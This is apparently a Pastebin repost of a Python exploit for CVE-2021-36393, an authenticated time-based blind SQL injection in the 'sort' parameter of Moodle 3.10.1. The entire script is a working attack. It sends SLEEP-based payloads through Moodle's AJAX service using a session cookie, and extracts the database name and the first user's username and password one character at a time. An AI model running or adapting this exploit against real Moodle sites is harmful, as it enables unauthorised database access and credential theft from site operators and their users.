Advertisement
FlyFar

Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - "sort" parameter

Apr 12th, 2024
4,266
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.76 KB | Cybersecurity | 0 0
  1. # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter
  2. # Google Dork:
  3. # Date: 04/11/2023
  4. # Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)
  5. # Vendor Homepage: https://moodle.org/
  6. # Software Link:
  7. # Version: 3.10.1
  8. # Tested on: Linux
  9. # CVE : CVE-2021-36393
  10.  
  11. import requests
  12. import string
  13. from termcolor import colored
  14.  
  15. # Request details
  16. URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"
  17. HEADERS = {
  18.     "Accept": "application/json, text/javascript, */*; q=0.01",
  19.     "Content-Type": "application/json",
  20.     "X-Requested-With": "XMLHttpRequest",
  21.     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",
  22.     "Origin": "http://127.0.0.1:8080",
  23.     "Referer": "http://127.0.0.1:8080/moodle/my/",
  24.     "Accept-Encoding": "gzip, deflate",
  25.     "Accept-Language": "en-US,en;q=0.9",
  26.     "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",
  27.     "Connection": "close"
  28. }
  29.  
  30. # Characters to test
  31. characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"
  32.  
  33. def test_character(payload):
  34.     response = requests.post(URL, headers=HEADERS, json=[payload])
  35.     return response.elapsed.total_seconds() >= 3
  36.  
  37. def extract_value(column, label):
  38.     base_payload = {
  39.         "index": 0,
  40.         "methodname": "core_course_get_enrolled_courses_by_timeline_classification",
  41.         "args": {
  42.             "offset": 0,
  43.             "limit": 0,
  44.             "classification": "all",
  45.             "sort": "",
  46.             "customfieldname": "",
  47.             "customfieldvalue": ""
  48.         }
  49.     }
  50.  
  51.     result = ""
  52.     for _ in range(50):  # Assumes a maximum of 50 characters for the value
  53.         character_found = False
  54.         for character in characters_to_test:
  55.             if column == "database()":
  56.                 base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"
  57.             else:
  58.                 base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"
  59.            
  60.             if test_character(base_payload):
  61.                 result += character
  62.                 print(colored(f"{label}: {result}", 'red'), end="\r")
  63.                 character_found = True
  64.                 break
  65.  
  66.         if not character_found:
  67.             break
  68.  
  69.     # Print the final result
  70.     print(colored(f"{label}: {result}", 'red'))
  71.  
  72. if __name__ == "__main__":
  73.     extract_value("database()", "Database")
  74.     extract_value("username", "Username")
  75.     extract_value("password", "Password")
  76.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement